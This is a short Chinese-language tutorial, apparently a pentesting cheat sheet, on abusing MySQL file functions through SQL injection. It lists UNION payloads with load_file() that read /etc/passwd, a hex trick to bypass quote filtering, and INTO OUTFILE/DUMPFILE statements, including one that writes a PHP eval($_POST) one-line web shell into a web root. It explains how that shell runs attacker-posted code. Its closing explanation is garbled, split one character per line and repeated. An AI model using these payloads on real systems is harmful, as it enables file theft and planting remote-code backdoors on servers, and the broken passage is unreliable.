导读:load_file()函数 读文件操作 前提: 知道文件绝对路径 能够使用union查询 对web目录有写权限 union select 1,load_file(’/etc/passwd’),3,4,5,6# union select 1,load_file(如果引号被过滤可以用16进制),3,4,5,6# into outfile()写文件操作 前提: 文件名必
load_file()函数 读文件操作 前提: 知道文件绝对路径 能够使用union查询 对web目录有写权限 union select 1,load_file(’/etc/passwd’),3,4,5,6# union select 1,load_file(如果引号被过滤可以用16进制),3,4,5,6#
into outfile()写文件操作 前提: 文件名必须全路径(绝对路径) 用户必须有写文件的权限 没有对’引号过滤 select ‘<?PHP PHPinfo?>’ into outfile ‘绝对路径’ select ‘12345’ into outfile ‘d:/2.txt’
into dumpfile()写文件操作 支持二进制读写 select ‘12345’ into dumpfile ‘d:/3.txt’
select ‘<?PHP eval($_POST[1]);?>’ into outfile ‘d:/PHPstudy/www/1.PHP’ 在目录d:/PHPstudy/www/下新建一个1.PHP文件内容是<?PHP eval($_POST[1]);?>
写入一句话木马
P
O
S
T
[
1
]
接
收
p
o
s
t
传
来
的
1
的
参
数
e
v
a
l
(
)
函
数
把
当
前
字
符
串
内
容
当
成
p
h
p
代
码
来
执
行
通
过
P
O
S
T
方
式
在
网
页
中
把
自
己
写
的
代
码
赋
值
给
1
,
然
后
_POST[1] 接收post传来的1的参数 eval()函数 把当前字符串内容当成PHP代码来执行 通过POST方式在网页中把自己写的代码赋值给1,然后
P?OST[1]接收post传来的1的参数eval()函数把当前字符串内容当成PHP代码来执行通过POST方式在网页中把自己写的代码赋值给1,然后_POST函数接收1的值,再通过eval函数就执行自己传送的代码了
